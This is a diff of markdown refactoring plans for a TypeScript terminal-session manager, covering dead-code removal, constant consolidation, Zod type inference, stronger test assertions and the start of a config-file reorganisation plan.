`levenshteinDistance()` is called by `stringSimilarity()`, and `normalizePhrase()` and `isSimilarByDistance()` are called by `fuzzyPhraseMatch()`. So they cannot be deleted -- they just need to be un-exported (made private to the module).
|
||||
|
||||
`isSimilar()` is truly dead -- not called by anything. Delete it entirely.
|
||||
|
||||
### Edit 1: Remove `export` from `levenshteinDistance`
|
||||
|
||||
**File**: `src/utils/string-similarity.ts`
|
||||
|
||||
**Old code** (line 27):
|
||||
```typescript
|
||||
export function levenshteinDistance(a: string, b: string): number {
|
||||
```
|
||||
|
||||
**New code**:
|
||||
```typescript
|
||||
function levenshteinDistance(a: string, b: string): number {
|
||||
```
|
||||
|
||||
### Edit 2: Delete `isSimilar` function entirely
|
||||
|
||||
**File**: `src/utils/string-similarity.ts`
|
||||
|
||||
**Old code** (lines 94-108):
|
||||
```typescript
|
||||
/**
|
||||
* Check if two strings are similar within a given threshold.
|
||||
*
|
||||
* @param a - First string
|
||||
* @param b - Second string
|
||||
* @param threshold - Minimum similarity ratio (default: 0.85 = 85% similar)
|
||||
* @returns True if similarity >= threshold
|
||||
*
|
||||
* @example
|
||||
* isSimilar('COMPLETE', 'COMPLET', 0.85) // true (87.5% similar)
|
||||
* isSimilar('COMPLETE', 'DONE', 0.85) // false (0% similar)
|
||||
*/
|
||||
export function isSimilar(a: string, b: string, threshold = 0.85): boolean {
|
||||
return stringSimilarity(a, b) >= threshold;
|
||||
}
|
||||
```
|
||||
|
||||
**New code**: (delete entirely -- replace with empty string)
|
||||
|
||||
### Edit 3: Remove `export` from `isSimilarByDistance`
|
||||
|
||||
**File**: `src/utils/string-similarity.ts`
|
||||
|
||||
**Old code** (line 123):
|
||||
```typescript
|
||||
export function isSimilarByDistance(a: string, b: string, maxDistance = 2): boolean {
|
||||
```
|
||||
|
||||
**New code**:
|
||||
```typescript
|
||||
function isSimilarByDistance(a: string, b: string, maxDistance = 2): boolean {
|
||||
```
|
||||
|
||||
### Edit 4: Remove `export` from `normalizePhrase`
|
||||
|
||||
**File**: `src/utils/string-similarity.ts`
|
||||
|
||||
**Old code** (line 139):
|
||||
```typescript
|
||||
export function normalizePhrase(phrase: string): string {
|
||||
```
|
||||
|
||||
**New code**:
|
||||
```typescript
|
||||
function normalizePhrase(phrase: string): string {
|
||||
```
|
||||
|
||||
### Verification
|
||||
|
||||
```bash
|
||||
tsc --noEmit
|
||||
npx vitest run test/string-utilities.test.ts
|
||||
npm run lint
|
||||
```
|
||||
|
||||
Note: If `test/string-utilities.test.ts` imports any of the now-unexported functions, those test imports will fail. Check the test file and remove tests for `isSimilar` (deleted) and update any direct tests for `levenshteinDistance`, `isSimilarByDistance`, `normalizePhrase` to test them indirectly through the public API (`stringSimilarity`, `fuzzyPhraseMatch`), or remove those tests.
|
||||
|
||||
---
|
||||
|
||||
## Task 3: Consolidate Duplicated `EXEC_TIMEOUT_MS` Constant
|
||||
|
||||
**Files**:
|
||||
- `src/utils/claude-cli-resolver.ts` (line 17)
|
||||
- `src/utils/opencode-cli-resolver.ts` (line 16)
|
||||
- `src/tmux-manager.ts` (line 63) -- also has its own copy
|
||||
|
||||
**Time**: ~15 minutes
|
||||
|
||||
### Problem
|
||||
|
||||
`EXEC_TIMEOUT_MS = 5000` is defined identically in three files. Changes need to happen in all three places.
|
||||
|
||||
### Strategy
|
||||
|
||||
Create a shared constant and export it. The natural home is a new config file since the existing config files (`buffer-limits.ts`, `map-limits.ts`) follow this pattern. However, to keep it minimal, we can add it to an existing config file or create a small one.
|
||||
|
||||
**Recommended approach**: Add to `src/config/timing-config.ts` (new file) as a single constant. This file can grow later in Phase 6 to hold other timing constants.
|
||||
|
||||
Alternatively, the simplest approach: export from one of the existing utils and import in the others. Since both CLI resolvers are in `src/utils/`, the cleanest approach is to put it in a shared location.
|
||||
|
||||
### Option A: Add to existing config (simpler)
|
||||
|
||||
Create `src/config/exec-timeout.ts`:
|
||||
|
||||
**New file**: `src/config/exec-timeout.ts`
|
||||
```typescript
|
||||
/**
|
||||
* Timeout for child process exec commands (e.g., `which claude`, `which opencode`, tmux commands).
|
||||
* Used across CLI resolvers and tmux manager.
|
||||
*/
|
||||
export const EXEC_TIMEOUT_MS = 5000;
|
||||
```
|
||||
|
||||
### Edit 1: Update `claude-cli-resolver.ts`
|
||||
|
||||
**File**: `src/utils/claude-cli-resolver.ts`
|
||||
|
||||
**Old code** (lines 11-17):
|
||||
```typescript
|
||||
import { execSync } from 'node:child_process';
|
||||
import { existsSync } from 'node:fs';
|
||||
import { delimiter, dirname, join } from 'node:path';
|
||||
import { homedir } from 'node:os';
|
||||
|
||||
/** Timeout for exec commands (5 seconds) */
|
||||
const EXEC_TIMEOUT_MS = 5000;
|
||||
```
|
||||
|
||||
**New code**:
|
||||
```typescript
|
||||
import { execSync } from 'node:child_process';
|
||||
import { existsSync } from 'node:fs';
|
||||
import { delimiter, dirname, join } from 'node:path';
|
||||
import { homedir } from 'node:os';
|
||||
import { EXEC_TIMEOUT_MS } from '../config/exec-timeout.js';
|
||||
```
|
||||
|
||||
### Edit 2: Update `opencode-cli-resolver.ts`
|
||||
|
||||
**File**: `src/utils/opencode-cli-resolver.ts`
|
||||
|
||||
**Old code** (lines 10-16):
|
||||
```typescript
|
||||
import { execSync } from 'node:child_process';
|
||||
import { existsSync } from 'node:fs';
|
||||
import { dirname, join } from 'node:path';
|
||||
import { homedir } from 'node:os';
|
||||
|
||||
/** Timeout for exec commands (5 seconds) */
|
||||
const EXEC_TIMEOUT_MS = 5000;
|
||||
```
|
||||
|
||||
**New code**:
|
||||
```typescript
|
||||
import { execSync } from 'node:child_process';
|
||||
import { existsSync } from 'node:fs';
|
||||
import { dirname, join } from 'node:path';
|
||||
import { homedir } from 'node:os';
|
||||
import { EXEC_TIMEOUT_MS } from '../config/exec-timeout.js';
|
||||
```
|
||||
|
||||
### Edit 3: Update `tmux-manager.ts`
|
||||
|
||||
**File**: `src/tmux-manager.ts`
|
||||
|
||||
**Old code** (line 63):
|
||||
```typescript
|
||||
const EXEC_TIMEOUT_MS = 5000;
|
||||
```
|
||||
|
||||
**New code**:
|
||||
```typescript
|
||||
import { EXEC_TIMEOUT_MS } from './config/exec-timeout.js';
|
||||
```
|
||||
|
||||
Note: `tmux-manager.ts` already has many imports at the top of the file. Add this import near the other local imports (around lines 43-56). The `const EXEC_TIMEOUT_MS = 5000;` on line 63 should be deleted entirely (replaced with the import).
|
||||
|
||||
### Verification
|
||||
|
||||
```bash
|
||||
tsc --noEmit
|
||||
npm run lint
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Task 4: Add `z.infer` to Zod Schemas
|
||||
|
||||
**Files**:
|
||||
- `src/web/schemas.ts` (add type exports)
|
||||
- `src/types.ts` (replace manual interfaces with `z.infer` re-exports where applicable)
|
||||
|
||||
**Time**: ~2 hours
|
||||
|
||||
### Problem
|
||||
|
||||
All 30+ Zod schemas in `schemas.ts` define validation rules, but zero use `z.infer` to derive TypeScript types. Instead, `types.ts` manually duplicates interfaces that match the schemas. When a schema changes, the type must be manually updated too.
|
||||
|
||||
### Strategy
|
||||
|
||||
Add `z.infer` type exports to `schemas.ts` for each exported schema. This creates derived types as the single source of truth. For schemas that have corresponding manual interfaces in `types.ts`, the manual interface can be replaced with a re-export of the inferred type.
|
||||
|
||||
**Important**: Not all schemas have matching interfaces in `types.ts`. The `RespawnConfig` interface in `types.ts` (line 395) has all required fields, while `RespawnConfigSchema` has all optional fields (it's for partial updates). These are NOT the same type and should NOT be unified.
|
||||
|
||||
### Edit 1: Add inferred type exports to `schemas.ts`
|
||||
|
||||
**File**: `src/web/schemas.ts`
|
||||
|
||||
After each schema definition, add a corresponding type export. Add the following lines at the **end of the file** (after line 509):
|
||||
|
||||
**Old code** (end of file, lines 506-509):
|
||||
```typescript
|
||||
.optional(),
|
||||
});
|
||||
```
|
||||
|
||||
Wait -- the end of file is actually at line 509 after the `RalphLoopStartSchema`. Add the type exports after the last schema:
|
||||
|
||||
**Append to end of file** `src/web/schemas.ts`:
|
||||
|
||||
```typescript
|
||||
|
||||
// ========== Inferred Types ==========
|
||||
// Derive TypeScript types from Zod schemas (single source of truth)
|
||||
|
||||
export type CreateSessionInput = z.infer<typeof CreateSessionSchema>;
|
||||
export type RunPromptInput = z.infer<typeof RunPromptSchema>;
|
||||
export type ResizeInput = z.infer<typeof ResizeSchema>;
|
||||
export type CreateCaseInput = z.infer<typeof CreateCaseSchema>;
|
||||
export type QuickStartInput = z.infer<typeof QuickStartSchema>;
|
||||
export type HookEventInput = z.infer<typeof HookEventSchema>;
|
||||
export type RespawnConfigInput = z.infer<typeof RespawnConfigSchema>;
|
||||
export type ConfigUpdateInput = z.infer<typeof ConfigUpdateSchema>;
|
||||
export type SettingsUpdateInput = z.infer<typeof SettingsUpdateSchema>;
|
||||
export type SessionInputWithLimitInput = z.infer<typeof SessionInputWithLimitSchema>;
|
||||
export type SessionNameInput = z.infer<typeof SessionNameSchema>;
|
||||
export type SessionColorInput = z.infer<typeof SessionColorSchema>;
|
||||
export type RalphConfigInput = z.infer<typeof RalphConfigSchema>;
|
||||
export type FixPlanImportInput = z.infer<typeof FixPlanImportSchema>;
|
||||
export type RalphPromptWriteInput = z.infer<typeof RalphPromptWriteSchema>;
|
||||
export type AutoClearInput = z.infer<typeof AutoClearSchema>;
|
||||
export type AutoCompactInput = z.infer<typeof AutoCompactSchema>;
|
||||
export type ImageWatcherInput = z.infer<typeof ImageWatcherSchema>;
|
||||
export type FlickerFilterInput = z.infer<typeof FlickerFilterSchema>;
|
||||
export type QuickRunInput = z.infer<typeof QuickRunSchema>;
|
||||
export type ScheduledRunInput = z.infer<typeof ScheduledRunSchema>;
|
||||
export type LinkCaseInput = z.infer<typeof LinkCaseSchema>;
|
||||
export type GeneratePlanInput = z.infer<typeof GeneratePlanSchema>;
|
||||
export type GeneratePlanDetailedInput = z.infer<typeof GeneratePlanDetailedSchema>;
|
||||
export type CancelPlanInput = z.infer<typeof CancelPlanSchema>;
|
||||
export type PlanTaskUpdateInput = z.infer<typeof PlanTaskUpdateSchema>;
|
||||
export type PlanTaskAddInput = z.infer<typeof PlanTaskAddSchema>;
|
||||
export type CpuLimitInput = z.infer<typeof CpuLimitSchema>;
|
||||
export type SubagentWindowStatesInput = z.infer<typeof SubagentWindowStatesSchema>;
|
||||
export type SubagentParentMapInput = z.infer<typeof SubagentParentMapSchema>;
|
||||
export type InteractiveRespawnInput = z.infer<typeof InteractiveRespawnSchema>;
|
||||
export type RespawnEnableInput = z.infer<typeof RespawnEnableSchema>;
|
||||
export type PushSubscribeInput = z.infer<typeof PushSubscribeSchema>;
|
||||
export type PushPreferencesUpdateInput = z.infer<typeof PushPreferencesUpdateSchema>;
|
||||
export type RalphLoopStartInput = z.infer<typeof RalphLoopStartSchema>;
|
||||
```
|
||||
|
||||
### What NOT to do
|
||||
|
||||
Do NOT replace the `RespawnConfig` interface in `types.ts` with `z.infer<typeof RespawnConfigSchema>`. The schema has all optional fields (for partial config updates), but the interface has required fields (for the full config object). These are intentionally different shapes.
|
||||
|
||||
Similarly, do NOT try to unify every interface in `types.ts` with a schema -- most interfaces in `types.ts` represent internal domain objects (SessionState, TaskState, etc.) that have no corresponding Zod schema. The schemas only exist for API request validation.
|
||||
|
||||
### Future opportunity
|
||||
|
||||
In a future phase, route handlers in `server.ts` can use these inferred types for request body typing:
|
||||
```typescript
|
||||
const body = CreateSessionSchema.parse(request.body) as CreateSessionInput;
|
||||
```
|
||||
This task only adds the type exports. Migrating route handlers to use them is out of scope.
|
||||
|
||||
### Verification
|
||||
|
||||
```bash
|
||||
tsc --noEmit
|
||||
npm run lint
|
||||
npm run format:check
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Task 5: Fix Weak `not.toThrow()` Tests with Behavioral Assertions
|
||||
|
||||
**Files**:
|
||||
- `test/task-tracker.test.ts` -- 6 instances
|
||||
- `test/image-watcher.test.ts` -- 1 instance
|
||||
- `test/task-queue.test.ts` -- 1 instance
|
||||
- `test/hooks-config.test.ts` -- 1 instance
|
||||
- `test/session-manager.test.ts` -- 1 instance
|
||||
|
||||
**Time**: ~1 hour
|
||||
|
||||
### Problem
|
||||
|
||||
10 tests only assert `not.toThrow()` without verifying the actual defensive behavior. These tests prove the code doesn't crash but don't verify it does the right thing.
|
||||
|
||||
### Fix Strategy
|
||||
|
||||
After each `not.toThrow()`, add a behavioral assertion that verifies the state is correct (e.g., no tasks were created, no side effects occurred).
|
||||
|
||||
### Edit 1: `task-tracker.test.ts` -- null message (line 566)
|
||||
|
||||
**File**: `test/task-tracker.test.ts`
|
||||
|
||||
**Old code**:
|
||||
```typescript
|
||||
it('should handle null message', () => {
|
||||
expect(() => tracker.processMessage(null)).not.toThrow();
|
||||
});
|
||||
```
|
||||
|
||||
**New code**:
|
||||
```typescript
|
||||
it('should handle null message', () => {
|
||||
expect(() => tracker.processMessage(null)).not.toThrow();
|
||||
expect(tracker.getAllTasks().size).toBe(0);
|
||||
expect(tracker.getRunningCount()).toBe(0);
|
||||
});
|
||||
```
|
||||
|
||||
### Edit 2: `task-tracker.test.ts` -- message without content (line 569-571)
|
||||
|
||||
**File**: `test/task-tracker.test.ts`
|
||||
|
||||
**Old code**:
|
||||
```typescript
|
||||
it('should handle message without content', () => {
|
||||
expect(() => tracker.processMessage({ message: {} })).not.toThrow();
|
||||
});
|
||||
```
|
||||
|
||||
**New code**:
|
||||
```typescript
|
||||
it('should handle message without content', () => {
|
||||
expect(() => tracker.processMessage({ message: {} })).not.toThrow();
|
||||
expect(tracker.getAllTasks().size).toBe(0);
|
||||
});
|
||||
```
|
||||
|
||||
### Edit 3: `task-tracker.test.ts` -- empty content array (line 573-575)
|
||||
|
||||
**File**: `test/task-tracker.test.ts`
|
||||
|
||||
**Old code**:
|
||||
```typescript
|
||||
it('should handle empty content array', () => {
|
||||
expect(() => tracker.processMessage({ message: { content: [] } })).not.toThrow();
|
||||
});
|
||||
```
|
||||
|
||||
**New code**:
|
||||
```typescript
|
||||
it('should handle empty content array', () => {
|
||||
expect(() => tracker.processMessage({ message: { content: [] } })).not.toThrow();
|
||||
expect(tracker.getAllTasks().size).toBe(0);
|
||||
});
|
||||
```
|
||||
|
||||
### Edit 4: `task-tracker.test.ts` -- tool_result for unknown task (lines 577-590)
|
||||
|
||||
**File**: `test/task-tracker.test.ts`
|
||||
|
||||
**Old code**:
|
||||
```typescript
|
||||
it('should handle tool_result for unknown task', () => {
|
||||
expect(() => {
|
||||
tracker.processMessage({
|
||||
message: {
|
||||
content: [{
|
||||
type: 'tool_result',
|
||||
tool_use_id: 'unknown-task',
|
||||
is_error: false,
|
||||
content: 'Done',
|
||||
}],
|
||||
},
|
||||
});
|
||||
}).not.toThrow();
|
||||
});
|
||||
```
|
||||
|
||||
**New code**:
|
||||
```typescript
|
||||
it('should handle tool_result for unknown task', () => {
|
||||
expect(() => {
|
||||
tracker.processMessage({
|
||||
message: {
|
||||
content: [{
|
||||
type: 'tool_result',
|
||||
tool_use_id: 'unknown-task',
|
||||
is_error: false,
|
||||
content: 'Done',
|
||||
}],
|
||||
},
|
||||
});
|
||||
}).not.toThrow();
|
||||
expect(tracker.getTask('unknown-task')).toBeUndefined();
|
||||
expect(tracker.getAllTasks().size).toBe(0);
|
||||
});
|
||||
```
|
||||
|
||||
### Edit 5: `task-tracker.test.ts` -- empty terminal output (lines 592-595)
|
||||
|
||||
**File**: `test/task-tracker.test.ts`
|
||||
|
||||
**Old code**:
|
||||
```typescript
|
||||
it('should handle empty terminal output', () => {
|
||||
expect(() => tracker.processTerminalOutput('')).not.toThrow();
|
||||
expect(() => tracker.processTerminalOutput(' ')).not.toThrow();
|
||||
});
|
||||
```
|
||||
|
||||
**New code**:
|
||||
```typescript
|
||||
it('should handle empty terminal output', () => {
|
||||
expect(() => tracker.processTerminalOutput('')).not.toThrow();
|
||||
expect(() => tracker.processTerminalOutput(' ')).not.toThrow();
|
||||
expect(tracker.getAllTasks().size).toBe(0);
|
||||
expect(tracker.getRunningCount()).toBe(0);
|
||||
});
|
||||
```
|
||||
|
||||
### Edit 6: `image-watcher.test.ts` -- unwatchSession for non-watched session (line 123)
|
||||
|
||||
**File**: `test/image-watcher.test.ts`
|
||||
|
||||
**Old code**:
|
||||
```typescript
|
||||
it('should be safe to call for non-watched session', () => {
|
||||
expect(() => watcher.unwatchSession('nonexistent')).not.toThrow();
|
||||
});
|
||||
```
|
||||
|
||||
**New code**:
|
||||
```typescript
|
||||
it('should be safe to call for non-watched session', () => {
|
||||
expect(() => watcher.unwatchSession('nonexistent')).not.toThrow();
|
||||
expect(watcher.getWatchedSessions()).toHaveLength(0);
|
||||
});
|
||||
```
|
||||
|
||||
### Edit 7: `task-queue.test.ts` -- dependencies on non-existent tasks (lines 538-542)
|
||||
|
||||
**File**: `test/task-queue.test.ts`
|
||||
|
||||
**Old code**:
|
||||
```typescript
|
||||
it('should allow dependencies on non-existent tasks (just unsatisfied, not a cycle)', () => {
|
||||
// Dependencies on non-existent tasks are valid - they just won't be satisfied
|
||||
expect(() => {
|
||||
queue.addTask({ prompt: 'Task D', dependencies: ['non-existent-id'] });
|
||||
}).not.toThrow();
|
||||
});
|
||||
```
|
||||
|
||||
**New code**:
|
||||
```typescript
|
||||
it('should allow dependencies on non-existent tasks (just unsatisfied, not a cycle)', () => {
|
||||
// Dependencies on non-existent tasks are valid - they just won't be satisfied
|
||||
let task: ReturnType<typeof queue.addTask> | undefined;
|
||||
expect(() => {
|
||||
task = queue.addTask({ prompt: 'Task D', dependencies: ['non-existent-id'] });
|
||||
}).not.toThrow();
|
||||
expect(task).toBeDefined();
|
||||
expect(task!.dependencies).toEqual(['non-existent-id']);
|
||||
// Task should be pending but blocked (dependency unsatisfied)
|
||||
expect(queue.next()?.prompt).toBeUndefined();
|
||||
});
|
||||
```
|
||||
|
||||
Wait -- `queue.next()` returns `null` when no next task is available (all blocked). Let me adjust:
|
||||
|
||||
**New code** (corrected):
|
||||
```typescript
|
||||
it('should allow dependencies on non-existent tasks (just unsatisfied, not a cycle)', () => {
|
||||
// Dependencies on non-existent tasks are valid - they just won't be satisfied
|
||||
let task: ReturnType<typeof queue.addTask> | undefined;
|
||||
expect(() => {
|
||||
task = queue.addTask({ prompt: 'Task D', dependencies: ['non-existent-id'] });
|
||||
}).not.toThrow();
|
||||
expect(task).toBeDefined();
|
||||
expect(task!.dependencies).toEqual(['non-existent-id']);
|
||||
// Task exists but is blocked (dependency unsatisfied), so next() skips it
|
||||
expect(queue.getAllTasks()).toHaveLength(1);
|
||||
expect(queue.next()).toBeNull();
|
||||
});
|
||||
```
|
||||
|
||||
### Edit 8: `hooks-config.test.ts` -- valid JSON check (line 129)
|
||||
|
||||
**File**: `test/hooks-config.test.ts`
|
||||
|
||||
**Old code**:
|
||||
```typescript
|
||||
it('should write valid JSON', () => {
|
||||
writeHooksConfig(testDir);
|
||||
const settingsPath = join(testDir, '.claude', 'settings.local.json');
|
||||
const content = readFileSync(settingsPath, 'utf-8');
|
||||
expect(() => JSON.parse(content)).not.toThrow();
|
||||
});
|
||||
```
|
||||
|
||||
**New code**:
|
||||
```typescript
|
||||
it('should write valid JSON', () => {
|
||||
writeHooksConfig(testDir);
|
||||
const settingsPath = join(testDir, '.claude', 'settings.local.json');
|
||||
const content = readFileSync(settingsPath, 'utf-8');
|
||||
const parsed = JSON.parse(content);
|
||||
expect(parsed).toBeDefined();
|
||||
expect(typeof parsed).toBe('object');
|
||||
expect(parsed.hooks).toBeDefined();
|
||||
});
|
||||
```
|
||||
|
||||
### Edit 9: `session-manager.test.ts` -- stopSession for non-existent (line 216)
|
||||
|
||||
**File**: `test/session-manager.test.ts`
|
||||
|
||||
**Old code**:
|
||||
```typescript
|
||||
it('should handle non-existent session gracefully', async () => {
|
||||
await expect(manager.stopSession('non-existent')).resolves.not.toThrow();
|
||||
});
|
||||
```
|
||||
|
||||
**New code**:
|
||||
```typescript
|
||||
it('should handle non-existent session gracefully', async () => {
|
||||
await expect(manager.stopSession('non-existent')).resolves.not.toThrow();
|
||||
expect(manager.getSessionCount()).toBe(0);
|
||||
});
|
||||
```
|
||||
|
||||
### Verification
|
||||
|
||||
Run each test file individually:
|
||||
|
||||
```bash
|
||||
npx vitest run test/task-tracker.test.ts
|
||||
npx vitest run test/image-watcher.test.ts
|
||||
npx vitest run test/task-queue.test.ts
|
||||
npx vitest run test/hooks-config.test.ts
|
||||
npx vitest run test/session-manager.test.ts
|
||||
```
|
||||
|
||||
**Important**: `hooks-config.test.ts` and `session-manager.test.ts` spawn real servers on ports 3130-3131. Only run them if you are NOT running other tests that use those ports.
|
||||
|
||||
---
|
||||
|
||||
## Final Verification Checklist
|
||||
|
||||
After all 5 tasks are complete, run the following in order:
|
||||
|
||||
```bash
|
||||
# 1. TypeScript type checking
|
||||
tsc --noEmit
|
||||
|
||||
# 2. Linting
|
||||
npm run lint
|
||||
|
||||
# 3. Formatting
|
||||
npm run format:check
|
||||
|
||||
# 4. Run affected test files individually (NOT the full suite)
|
||||
npx vitest run test/string-utilities.test.ts
|
||||
npx vitest run test/task-tracker.test.ts
|
||||
npx vitest run test/image-watcher.test.ts
|
||||
npx vitest run test/task-queue.test.ts
|
||||
npx vitest run test/session-manager.test.ts
|
||||
npx vitest run test/hooks-config.test.ts
|
||||
```
|
||||
|
||||
If any formatting issues arise, fix with:
|
||||
```bash
|
||||
npm run format
|
||||
```
|
||||
|
||||
If any lint issues arise, fix with:
|
||||
```bash
|
||||
npm run lint:fix
|
||||
```
|
||||
|
||||
### Summary of Changes
|
||||
|
||||
| Task | Files Modified | Files Created |
|
||||
|------|---------------|---------------|
|
||||
| 1. Barrel exports | `src/utils/index.ts` | -- |
|
||||
| 2. Dead functions | `src/utils/string-similarity.ts` | -- |
|
||||
| 3. EXEC_TIMEOUT_MS | `src/utils/claude-cli-resolver.ts`, `src/utils/opencode-cli-resolver.ts`, `src/tmux-manager.ts` | `src/config/exec-timeout.ts` |
|
||||
| 4. z.infer types | `src/web/schemas.ts` | -- |
|
||||
| 5. Weak tests | `test/task-tracker.test.ts`, `test/image-watcher.test.ts`, `test/task-queue.test.ts`, `test/hooks-config.test.ts`, `test/session-manager.test.ts` | -- |
|
||||
|
||||
**Total files modified**: 10
|
||||
**Total files created**: 1
|
||||
@@ -1,689 +0,0 @@
|
||||
# Phase 6 Implementation Plan: Config Consolidation
|
||||
|
||||
**Source**: `docs/code-structure-findings.md` (Phase 6 — Config Consolidation)
|
||||
**Estimated effort**: 1 day
|
||||
**Tasks**: 8 tasks with dependencies (see dependency graph below)
|
||||
|
||||
---
|
||||
|
||||
## Safety Constraints
|
||||
|
||||
Before starting ANY work, read and follow these rules:
|
||||
|
||||
1. **Never run `npx vitest run`** (full suite) — it kills tmux sessions. You are running inside a Codeman-managed tmux session.
|
||||
2. **Run individual tests only**: `npx vitest run test/<file>.test.ts`
|
||||
3. **Never test on port 3000** — the live dev server runs there. Tests use ports 3150+.
|
||||
4. **After TypeScript changes**: Run `tsc --noEmit` to verify type checking passes.
|
||||
5. **Before considering done**: Run `npm run lint` and `npm run format:check` to ensure CI passes.
|
||||
6. **Never kill tmux sessions** — check `echo $CODEMAN_MUX` first.
|
||||
7. **Verify the dev server starts**: After each task, run `npx tsx src/index.ts web --port 3099 &` on a non-production port, confirm `curl -s http://localhost:3099/api/status | jq .status` returns `"ok"`, then kill the background process.
|
||||
|
||||
---
|
||||
|
||||
## Goal
|
||||
|
||||
Consolidate ~70 scattered numeric constants from 15+ source files into 6 new domain-focused config files, eliminating cross-file duplicates (including a 5x-duplicated AI model string) and making all tuning knobs discoverable in `src/config/`.
|
||||
|
||||
**Non-goal**: Moving every constant. Module-internal implementation details (like regex patterns, algorithm-specific magic numbers, or constants only used once in deeply coupled logic) stay where they are. The goal is discoverability of operational tuning knobs, not mechanical relocation.
|
||||
|
||||
---
|
||||
|
||||
## Design Decisions
|
||||
|
||||
### What gets centralized (and why)
|
||||
|
||||
Constants are candidates for centralization when they meet **any** of these criteria:
|
||||
|
||||
1. **Duplicated across files** — DRY violation (e.g., `STATS_COLLECTION_INTERVAL_MS` in `server.ts` and `mux-routes.ts`, AI model string in 5 files)
|
||||
2. **Operational tuning knobs** — values an operator might want to adjust for performance, security, or behavior without understanding the implementation (e.g., SSE health check interval, auth session TTL, rate limits)
|
||||
3. **Cross-cutting concerns** — values that establish system-wide contracts (e.g., max terminal dimensions used by both server routes and frontend)
|
||||
|
||||
### What stays in place (and why)
|
||||
|
||||
Constants that are **internal implementation details** of a single module stay where they are:
|
||||
|
||||
- **Algorithm parameters** — `TODO_SIMILARITY_THRESHOLD`, `adaptiveCompletionConfirmMs`, confidence weights. These are meaningless without understanding the algorithm.
|
||||
- **Display/UI formatting** — `TEXT_PREVIEW_LENGTH`, `SMART_TITLE_MAX_LENGTH`, `COMMAND_DISPLAY_LENGTH` in `subagent-watcher.ts`. Only used locally, tightly coupled to rendering logic.
|
||||
- **Module-internal timing** — `LINE_BUFFER_FLUSH_INTERVAL` in `session.ts`, `AI_CHECK_POLL_INTERVAL` in `ai-checker-base.ts`. Internal implementation of specific features.
|
||||
- **Frontend constants** — `constants.js` already centralizes frontend values well. Don't mix frontend and backend config.
|
||||
- **Respawn `DEFAULT_CONFIG`** — these are user-configurable defaults for the respawn config interface, not system constants. They live properly in `respawn-controller.ts`. The AI model/context defaults within it are replaced with imports from the new `ai-defaults.ts` (Task 5).
|
||||
- **Session auto-ops thresholds** — `AUTO_RETRY_DELAY_MS`, `COMPACT_COOLDOWN_MS`, etc. in `session-auto-ops.ts` are internal to that module's retry logic and already well-documented in place.
|
||||
|
||||
### File organization: domain-based, not category-based
|
||||
|
||||
A single `timing-config.ts` with 70 unrelated timing values would be worse than the current state — developers would need to grep it just like they grep the whole codebase now. Instead, constants are grouped by **the system they configure**:
|
||||
|
||||
| New File | Domain | Developer Question It Answers |
|
||||
|----------|--------|-------------------------------|
|
||||
| `server-timing.ts` | Web server performance | "How do I tune SSE batching / terminal throughput?" |
|
||||
| `auth-config.ts` | Authentication & security | "What are the rate limits and session TTLs?" |
|
||||
| `tunnel-config.ts` | QR auth & Cloudflare tunnel | "What are the QR token rotation parameters?" |
|
||||
| `terminal-limits.ts` | Terminal dimensions & input | "What are the max cols/rows/input size?" |
|
||||
| `ai-defaults.ts` | AI checker model & context | "What model do the AI checkers use? What's the context limit?" |
|
||||
| `team-config.ts` | Agent Teams polling & caching | "How often does team polling run? What are the cache limits?" |
|
||||
|
||||
---
|
||||
|
||||
## Task Dependencies
|
||||
|
||||
```
|
||||
Task 1 (server-timing.ts)
|
||||
Task 2 (auth-config.ts)
|
||||
Task 3 (tunnel-config.ts)
|
||||
Task 4 (terminal-limits.ts)
|
||||
Task 5 (ai-defaults.ts)
|
||||
Task 6 (team-config.ts)
|
||||
└──> Task 7 (Fix remaining duplicates)
|
||||
└──> Task 8 (Update CLAUDE.md + final verification)
|
||||
```
|
||||
|
||||
**Tasks 1–6** are independent and can run in parallel.
|
||||
**Task 7** depends on Tasks 1–6 (needs the new config files to exist).
|
||||
**Task 8** depends on Task 7.
|
||||
|
||||
---
|
||||
|
||||
## Task 1: Create `src/config/server-timing.ts`
|
||||
|
||||
**Estimated effort**: 30 minutes
|
||||
**Files created**: `src/config/server-timing.ts`
|
||||
**Files modified**: `src/web/server.ts`, `src/web/routes/mux-routes.ts`
|
||||
|
||||
### Constants to extract from `src/web/server.ts`
|
||||
|
||||
| Constant | Value | Purpose |
|
||||
|----------|-------|---------|
|
||||
| `TERMINAL_BATCH_INTERVAL` | `16` | Terminal data batching interval (60fps) |
|
||||
| `TASK_UPDATE_BATCH_INTERVAL` | `100` | Task event batching interval (ms) |
|
||||
| `STATE_UPDATE_DEBOUNCE_INTERVAL` | `500` | State persistence debounce (ms) |
|
||||
| `SESSIONS_LIST_CACHE_TTL` | `1000` | Sessions list cache TTL (ms) |
|
||||
| `SCHEDULED_CLEANUP_INTERVAL` | `300000` | Scheduled runs cleanup check (5 min) |
|
||||
| `SCHEDULED_RUN_MAX_AGE` | `3600000` | Completed scheduled run max age (1 hour) |
|
||||
| `SSE_HEALTH_CHECK_INTERVAL` | `30000` | SSE client health check (30s) |
|
||||
| `SESSION_LIMIT_WAIT_MS` | `5000` | Session limit retry wait (5s) |
|
||||
| `ITERATION_PAUSE_MS` | `2000` | Scheduled run iteration pause (2s) |
|
||||
| `BATCH_FLUSH_THRESHOLD` | `32768` | Terminal batch immediate flush threshold (32KB) |
|
||||
| `STATS_COLLECTION_INTERVAL_MS` | `2000` | Mux stats collection interval (2s) |
|
||||
|
||||
### Implementation
|
||||
|
||||
1. Create `src/config/server-timing.ts` with all 11 constants, preserving existing JSDoc comments.
|
||||
2. In `src/web/server.ts`: Remove the 11 local constant declarations (lines ~92–121). Add `import { TERMINAL_BATCH_INTERVAL, ... } from '../config/server-timing.js'`.
|
||||
3. In `src/web/routes/mux-routes.ts`: Remove the duplicate `STATS_COLLECTION_INTERVAL_MS` (line 10) and its comment. Add `import { STATS_COLLECTION_INTERVAL_MS } from '../../config/server-timing.js'`. This fixes a **duplicate constant** (finding #10).
|
||||
4. Run `tsc --noEmit`.
|
||||
|
||||
### New file template
|
||||
|
||||
```typescript
|
||||
/**
|
||||
* @fileoverview Web server performance and scheduling constants.
|
||||
*
|
||||
* Controls terminal batching throughput, SSE health checking,
|
||||
* state persistence debouncing, and scheduled run timing.
|
||||
*
|
||||
* @module config/server-timing
|
||||
*/
|
||||
|
||||
// ============================================================================
|
||||
// Terminal & SSE Performance
|
||||
// ============================================================================
|
||||
|
||||
/** Terminal data batching interval — targets 60fps (ms) */
|
||||
export const TERMINAL_BATCH_INTERVAL = 16;
|
||||
|
